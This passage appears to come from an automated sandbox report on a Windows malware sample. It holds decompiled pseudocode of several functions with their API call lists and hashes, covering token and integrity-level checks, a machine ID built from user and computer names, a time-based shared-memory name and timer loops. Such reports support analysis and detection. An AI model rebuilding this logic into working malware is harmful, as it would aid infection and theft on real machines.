                                                                                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                          							if(_t40 >= 0) {
                                                                                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                          								_t48 = 1;
                                                                                                                          							}
                                                                                                                          							E04974AAB(_t44);
                                                                                                                          						}
                                                                                                                          						NtClose(_v8); // executed
                                                                                                                          					}
                                                                                                                          					NtClose(_v12);
                                                                                                                          				}
                                                                                                                          				return _t48;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04975D57
                                                                                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04975D6A
                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04975D86
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04975DA3
                                                                                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04975DB0
                                                                                                                          • NtClose.NTDLL(?), ref: 04975DC2
                                                                                                                          • NtClose.NTDLL(00000000), ref: 04975DCC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2575439697-0
                                                                                                                          • Opcode ID: 678eb124b007b2a5d9200c9b3f26637292177fa883895e3e874288668aa0d726
                                                                                                                          • Instruction ID: 89e90dcfa706352448b4683841698060163ed167e5448c667eb9e5b53d16d444
                                                                                                                          • Opcode Fuzzy Hash: 678eb124b007b2a5d9200c9b3f26637292177fa883895e3e874288668aa0d726
                                                                                                                          • Instruction Fuzzy Hash: D221E676A00218BBDB01DF95CC45EDEBFBDEF48794F108026FA01E6110E7719A459BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E04975461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                          				struct %anon52 _v8;
                                                                                                                          				long _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				union _LARGE_INTEGER _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				void* _v44;
                                                                                                                          				void _v88;
                                                                                                                          				char _v92;
                                                                                                                          				struct %anon52 _t46;
                                                                                                                          				intOrPtr _t51;
                                                                                                                          				long _t53;
                                                                                                                          				void* _t54;
                                                                                                                          				struct %anon52 _t60;
                                                                                                                          				long _t64;
                                                                                                                          				signed int _t65;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t70;
                                                                                                                          				signed int _t71;
                                                                                                                          				intOrPtr _t73;
                                                                                                                          				intOrPtr _t76;
                                                                                                                          				void** _t78;
                                                                                                                          				void* _t80;
                                                                                                                          
                                                                                                                          				_t73 = __edx;
                                                                                                                          				_v92 = 0;
                                                                                                                          				memset( &_v88, 0, 0x2c);
                                                                                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                          				_v44 = _t46;
                                                                                                                          				if(_t46 == 0) {
                                                                                                                          					_v8.LowPart = GetLastError();
                                                                                                                          				} else {
                                                                                                                          					_push(0xffffffff);
                                                                                                                          					_push(0xff676980);
                                                                                                                          					_push(0);
                                                                                                                          					_push( *0x497d278);
                                                                                                                          					_v20 = 0;
                                                                                                                          					_v16 = 0;
                                                                                                                          					L0497AED0();
                                                                                                                          					_v36.LowPart = _t46;
                                                                                                                          					_v32 = _t73;
                                                                                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                          					_t51 =  *0x497d2a4; // 0x340
                                                                                                                          					_v40 = _t51;
                                                                                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                          					_v8.LowPart = _t53;
                                                                                                                          					if(_t53 == 0) {
                                                                                                                          						if(_a8 != 0) {
                                                                                                                          							L4:
                                                                                                                          							 *0x497d284 = 5;
                                                                                                                          						} else {
                                                                                                                          							_t68 = E0497502E(_t73); // executed
                                                                                                                          							if(_t68 != 0) {
                                                                                                                          								goto L4;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_v12 = 0;
                                                                                                                          						L6:
                                                                                                                          						L6:
                                                                                                                          						if(_v12 == 1 && ( *0x497d298 & 0x00000001) == 0) {
                                                                                                                          							_v12 = 2;
                                                                                                                          						}
                                                                                                                          						_t71 = _v12;
                                                                                                                          						_t58 = _t71 << 4;
                                                                                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                          						_t72 = _t71 + 1;
                                                                                                                          						_v24 = _t71 + 1;
                                                                                                                          						_t60 = E0497577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                                                                                          						_v8.LowPart = _t60;
                                                                                                                          						if(_t60 != 0) {
                                                                                                                          							goto L17;
                                                                                                                          						}
                                                                                                                          						_t65 = _v24;
                                                                                                                          						_v12 = _t65;
                                                                                                                          						_t90 = _t65 - 3;
                                                                                                                          						if(_t65 != 3) {
                                                                                                                          							goto L6;
                                                                                                                          						} else {
                                                                                                                          							_v8.LowPart = E04972107(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                          						}
                                                                                                                          						goto L12;
                                                                                                                          						L17:
                                                                                                                          						__eflags = _t60 - 0x10d2;
                                                                                                                          						if(_t60 != 0x10d2) {
                                                                                                                          							_push(0xffffffff);
                                                                                                                          							_push(0xff676980);
                                                                                                                          							_push(0);
                                                                                                                          							_push( *0x497d27c);
                                                                                                                          							goto L21;
                                                                                                                          						} else {
                                                                                                                          							__eflags =  *0x497d280; // 0x0
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								goto L12;
                                                                                                                          							} else {
                                                                                                                          								_t60 = E049747D5();
                                                                                                                          								_push(0xffffffff);
                                                                                                                          								_push(0xdc3cba00);
                                                                                                                          								_push(0);
                                                                                                                          								_push( *0x497d280);
                                                                                                                          								L21:
                                                                                                                          								L0497AED0();
                                                                                                                          								_v36.LowPart = _t60;
                                                                                                                          								_v32 = _t76;
                                                                                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                          								_v8.LowPart = _t64;
                                                                                                                          								__eflags = _t64;
                                                                                                                          								if(_t64 == 0) {
                                                                                                                          									goto L6;
                                                                                                                          								} else {
                                                                                                                          									goto L12;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L25:
                                                                                                                          					}
                                                                                                                          					L12:
                                                                                                                          					_t78 =  &_v92;
                                                                                                                          					_t70 = 3;
                                                                                                                          					do {
                                                                                                                          						_t54 =  *_t78;
                                                                                                                          						if(_t54 != 0) {
                                                                                                                          							HeapFree( *0x497d270, 0, _t54);
                                                                                                                          						}
                                                                                                                          						_t78 =  &(_t78[4]);
                                                                                                                          						_t70 = _t70 - 1;
                                                                                                                          					} while (_t70 != 0);
                                                                                                                          					CloseHandle(_v44);
                                                                                                                          				}
                                                                                                                          				return _v8;
                                                                                                                          				goto L25;
                                                                                                                          			}
                                                                                                                          0x04975516
                                                                                                                          0x0497551f
                                                                                                                          0x04975526
                                                                                                                          0x0497552f
                                                                                                                          0x04975532
                                                                                                                          0x04975535
                                                                                                                          0x0497553a
                                                                                                                          0x0497553f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04975541
                                                                                                                          0x04975544
                                                                                                                          0x04975547
                                                                                                                          0x0497554a
                                                                                                                          0x00000000
                                                                                                                          0x0497554c
                                                                                                                          0x0497555b
                                                                                                                          0x0497555b
                                                                                                                          0x00000000
                                                                                                                          0x04975589
                                                                                                                          0x04975589
                                                                                                                          0x0497558e
                                                                                                                          0x049755ad
                                                                                                                          0x049755af
                                                                                                                          0x049755b4
                                                                                                                          0x049755b5
                                                                                                                          0x00000000
                                                                                                                          0x04975590
                                                                                                                          0x04975590
                                                                                                                          0x04975596
                                                                                                                          0x00000000
                                                                                                                          0x04975598
                                                                                                                          0x04975598
                                                                                                                          0x0497559d
                                                                                                                          0x0497559f
                                                                                                                          0x049755a4
                                                                                                                          0x049755a5
                                                                                                                          0x049755bb
                                                                                                                          0x049755bb
                                                                                                                          0x049755c3
                                                                                                                          0x049755ce
                                                                                                                          0x049755d1
                                                                                                                          0x049755dc
                                                                                                                          0x049755de
                                                                                                                          0x049755e1
                                                                                                                          0x049755e3
                                                                                                                          0x00000000
                                                                                                                          0x049755e9
                                                                                                                          0x00000000
                                                                                                                          0x049755e9
                                                                                                                          0x049755e3
                                                                                                                          0x04975596
                                                                                                                          0x00000000
                                                                                                                          0x0497558e
                                                                                                                          0x0497555e
                                                                                                                          0x04975560
                                                                                                                          0x04975563
                                                                                                                          0x04975564
                                                                                                                          0x04975564
                                                                                                                          0x04975568
                                                                                                                          0x04975572
                                                                                                                          0x04975572
                                                                                                                          0x04975578
                                                                                                                          0x0497557b
                                                                                                                          0x0497557b
                                                                                                                          0x04975581
                                                                                                                          0x04975581
                                                                                                                          0x049755fe
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • memset.NTDLL ref: 04975476
                                                                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04975482
                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 049754A7
                                                                                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 049754C3
                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049754DC
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04975572
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04975581
                                                                                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 049755BB
                                                                                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,049753C9,?), ref: 049755D1
                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049755DC
                                                                                                                            • Part of subcall function 0497502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06FF93A8,?,00000000,30314549,00000014,004F0053,06FF9364), ref: 0497511A
                                                                                                                            • Part of subcall function 0497502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049754EF), ref: 0497512C
                                                                                                                          • GetLastError.KERNEL32 ref: 049755EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3521023985-0
                                                                                                                          • Opcode ID: 564e4da861b016461d9d28070fdadf4ff00d9b3e884258fad56454875264898a
                                                                                                                          • Instruction ID: dbc961d4c0b04b3420d8227443756091755d9a5d993fb4ba3e8c5fc0fecf33a0
                                                                                                                          • Opcode Fuzzy Hash: 564e4da861b016461d9d28070fdadf4ff00d9b3e884258fad56454875264898a
                                                                                                                          • Instruction Fuzzy Hash: 2C5148B1805228BBEF509FA4DC44DEEBFB9EF49730F204626F515A2190D634AA40DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04973598(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				struct _FILETIME* _v12;
                                                                                                                          				short _v56;
                                                                                                                          				struct _FILETIME* _t12;
                                                                                                                          				intOrPtr _t13;
                                                                                                                          				void* _t17;
                                                                                                                          				void* _t21;
                                                                                                                          				intOrPtr _t27;
                                                                                                                          				long _t28;
                                                                                                                          				void* _t30;
                                                                                                                          
                                                                                                                          				_t27 = __edx;
                                                                                                                          				_t12 =  &_v12;
                                                                                                                          				GetSystemTimeAsFileTime(_t12);
                                                                                                                          				_push(0x192);
                                                                                                                          				_push(0x54d38000);
                                                                                                                          				_push(_v8);
                                                                                                                          				_push(_v12);
                                                                                                                          				L0497AECA();
                                                                                                                          				_push(_t12);
                                                                                                                          				_v12 = _t12;
                                                                                                                          				_t13 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          				_t5 = _t13 + 0x497e876; // 0x6ff8e1e
                                                                                                                          				_t6 = _t13 + 0x497e59c; // 0x530025
                                                                                                                          				_push(0x16);
                                                                                                                          				_push( &_v56);
                                                                                                                          				_v8 = _t27;
                                                                                                                          				L0497ABEA();
                                                                                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x497d2e4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                          				_t30 = _t17;
                                                                                                                          				if(_t30 == 0) {
                                                                                                                          					_t28 = GetLastError();
                                                                                                                          				} else {
                                                                                                                          					if(GetLastError() == 0xb7) {
                                                                                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                          						if(_t21 == 0) {
                                                                                                                          							_t28 = GetLastError();
                                                                                                                          							if(_t28 != 0) {
                                                                                                                          								goto L6;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							 *_a4 = _t30;
                                                                                                                          							 *_a8 = _t21;
                                                                                                                          							_t28 = 0;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t28 = 2;
                                                                                                                          						L6:
                                                                                                                          						CloseHandle(_t30);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t28;
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,0497529C,?,?,4D283A53,?,?), ref: 049735A4
                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 049735BA
                                                                                                                          • _snwprintf.NTDLL ref: 049735DF
                                                                                                                          • CreateFileMappingW.KERNELBASE(000000FF,0497D2E4,00000004,00000000,00001000,?), ref: 049735FB
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0497529C,?,?,4D283A53), ref: 0497360D
                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04973624
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0497529C,?,?), ref: 04973645
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0497529C,?,?,4D283A53), ref: 0497364D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1814172918-0
                                                                                                                          • Opcode ID: 49e94afc19254c174de60ef0774ba9257bd908679cd0f6c6200b3b56f9c61d1c
                                                                                                                          • Instruction ID: 4c8a90c11291546af85291120047e02ed0dd75c3b1cb7508eea45a2e8b0cb34e
                                                                                                                          • Opcode Fuzzy Hash: 49e94afc19254c174de60ef0774ba9257bd908679cd0f6c6200b3b56f9c61d1c
                                                                                                                          • Instruction Fuzzy Hash: 0521D272600204BBDB219B64DC4AF8D3BADEB84B04F100131FA06E7280E674E905DB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0497A82B(char __eax, void* __esi) {
                                                                                                                          				long _v8;
                                                                                                                          				char _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v28;
                                                                                                                          				long _t34;
                                                                                                                          				signed int _t39;
                                                                                                                          				long _t50;
                                                                                                                          				char _t59;
                                                                                                                          				intOrPtr _t61;
                                                                                                                          				void* _t62;
                                                                                                                          				void* _t64;
                                                                                                                          				char _t65;
                                                                                                                          				intOrPtr* _t67;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t69;
                                                                                                                          
                                                                                                                          				_t69 = __esi;
                                                                                                                          				_t65 = __eax;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v12 = __eax;
                                                                                                                          				if(__eax == 0) {
                                                                                                                          					_t59 =  *0x497d2a8; // 0xd448b889
                                                                                                                          					_v12 = _t59;
                                                                                                                          				}
                                                                                                                          				_t64 = _t69;
                                                                                                                          				E049760B6( &_v12, _t64);
                                                                                                                          				if(_t65 != 0) {
                                                                                                                          					 *_t69 =  *_t69 ^  *0x497d2dc ^ 0x46d76429;
                                                                                                                          				} else {
                                                                                                                          					GetUserNameW(0,  &_v8); // executed
                                                                                                                          					_t50 = _v8;
                                                                                                                          					if(_t50 != 0) {
                                                                                                                          						_t62 = RtlAllocateHeap( *0x497d270, 0, _t50 + _t50);
                                                                                                                          						if(_t62 != 0) {
                                                                                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                          								_t64 = _t62;
                                                                                                                          								 *_t69 =  *_t69 ^ E0497789B(_v8 + _v8, _t64);
                                                                                                                          							}
                                                                                                                          							HeapFree( *0x497d270, 0, _t62);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t61 = __imp__;
                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                          				GetComputerNameW(0,  &_v8);
                                                                                                                          				_t34 = _v8;
                                                                                                                          				if(_t34 != 0) {
                                                                                                                          					_t68 = RtlAllocateHeap( *0x497d270, 0, _t34 + _t34);
                                                                                                                          					if(_t68 != 0) {
                                                                                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                          							_t64 = _t68;
                                                                                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0497789B(_v8 + _v8, _t64);
                                                                                                                          						}
                                                                                                                          						HeapFree( *0x497d270, 0, _t68);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				asm("cpuid");
                                                                                                                          				_t67 =  &_v28;
                                                                                                                          				 *_t67 = 1;
                                                                                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                                                                                          				 *(_t67 + 0xc) = _t64;
                                                                                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                                                                                          				return _t39;
                                                                                                                          			}




















                                                                                                                          APIs
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0497A862
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0497A879
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0497A886
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0497538B), ref: 0497A8A7
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0497A8CE
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0497A8E2
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0497A8EF
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0497538B), ref: 0497A90D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3239747167-0
                                                                                                                          • Opcode ID: a3af8de231efa94e222f643ce543888ba335b557fa359e378e9b41b7ffde9e5c
                                                                                                                          • Instruction ID: 5d2bccfd24f677493393ac7e4c1db0b400f11b0d007fff1f3d7f5b2ba95b9172
                                                                                                                          • Opcode Fuzzy Hash: a3af8de231efa94e222f643ce543888ba335b557fa359e378e9b41b7ffde9e5c
                                                                                                                          • Instruction Fuzzy Hash: AB31DC71A04205EFEB10DFA5DD81AAEBBF9FF44310B11457AE505E3211E734EE069B50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04974151(long* _a4) {
                                                                                                                          				long _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				void _v16;
                                                                                                                          				long _v20;
                                                                                                                          				int _t33;
                                                                                                                          				void* _t46;
                                                                                                                          
                                                                                                                          				_v16 = 1;
                                                                                                                          				_v20 = 0x2000;
                                                                                                                          				if( *0x497d294 > 5) {
                                                                                                                          					_v16 = 0;
                                                                                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                          						_v8 = 0;
                                                                                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                          						if(_v8 != 0) {
                                                                                                                          							_t46 = E049775F6(_v8);
                                                                                                                          							if(_t46 != 0) {
                                                                                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                          								if(_t33 != 0) {
                                                                                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                          								}
                                                                                                                          								E04974AAB(_t46);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						CloseHandle(_v12);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *_a4 = _v20;
                                                                                                                          				return _v16;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04974183
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 049741A3
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 049741B3
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04974203
                                                                                                                            • Part of subcall function 049775F6: RtlAllocateHeap.NTDLL(00000000,00000000,04974F70), ref: 04977602
                                                                                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 049741D6
                                                                                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 049741DE
                                                                                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 049741EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1295030180-0
                                                                                                                          • Opcode ID: a060705669deef410556d25ab2bad5986499d1bb2ee3965fe078c38061ddcc6c
                                                                                                                          • Instruction ID: 079de00e2ccc7a7906ec4bcc4268c5a2a19ead8ba8d76a2fd9e8c2f558b70d79
                                                                                                                          • Opcode Fuzzy Hash: a060705669deef410556d25ab2bad5986499d1bb2ee3965fe078c38061ddcc6c
                                                                                                                          • Instruction Fuzzy Hash: 9B215975900219FFEB00AF94DC84EAEBFB9EF48304F0000B6EA10A6261C775AE15DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E0497262F(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                          				struct _FILETIME _v12;
                                                                                                                          				void* _t10;
                                                                                                                          				void* _t12;
                                                                                                                          				int _t14;
                                                                                                                          				signed int _t16;
                                                                                                                          				void* _t18;
                                                                                                                          				signed int _t19;
                                                                                                                          				unsigned int _t23;
                                                                                                                          				void* _t27;
                                                                                                                          				signed int _t34;
                                                                                                                          
                                                                                                                          				_t27 = __edx;
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                          				 *0x497d270 = _t10;
                                                                                                                          				if(_t10 != 0) {
                                                                                                                          					 *0x497d160 = GetTickCount();
                                                                                                                          					_t12 = E04971A24(_a4);
                                                                                                                          					if(_t12 == 0) {
                                                                                                                          						do {
                                                                                                                          							GetSystemTimeAsFileTime( &_v12);
                                                                                                                          							_t14 = SwitchToThread();
                                                                                                                          							_t23 = _v12.dwHighDateTime;
                                                                                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                                                                                          							_push(0);
                                                                                                                          							_push(0x13);
                                                                                                                          							_push(_t23 >> 5);
                                                                                                                          							_push(_t16);
                                                                                                                          							L0497B02E();
                                                                                                                          							_t34 = _t14 + _t16;
                                                                                                                          							_t18 = E04974F23(_a4, _t34);
                                                                                                                          							_t19 = 3;
                                                                                                                          							_t26 = _t34 & 0x00000007;
                                                                                                                          							Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                                                                                          						} while (_t18 == 1);
                                                                                                                          						if(E049727C7(_t26) != 0) {
                                                                                                                          							 *0x497d298 = 1; // executed
                                                                                                                          						}
                                                                                                                          						_t12 = E0497520D(_t27); // executed
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t12 = 8;
                                                                                                                          				}
                                                                                                                          				return _t12;
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04971900,?), ref: 04972642
                                                                                                                          • GetTickCount.KERNEL32 ref: 04972656
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04971900,?), ref: 04972672
                                                                                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04971900,?), ref: 04972678
                                                                                                                          • _aullrem.NTDLL(?,?,00000013,00000000), ref: 04972695
                                                                                                                          • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,04971900,?), ref: 049726B2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 507476733-0
                                                                                                                          • Opcode ID: bd861dcbf6c820aa1a7597321911e384b9d87de7de33533b7b59ef1f007095d3
                                                                                                                          • Instruction ID: 45950fe960511109a5652d2e13d7443340dfeade41860a77aedfef7c83844413
                                                                                                                          • Opcode Fuzzy Hash: bd861dcbf6c820aa1a7597321911e384b9d87de7de33533b7b59ef1f007095d3
                                                                                                                          • Instruction Fuzzy Hash: 7C11A972B543046BEB106B74DC4DF5A7B9CFB84355F00023AFA15D6280EAB4F84087A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E0497520D(signed int __edx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				long _v12;
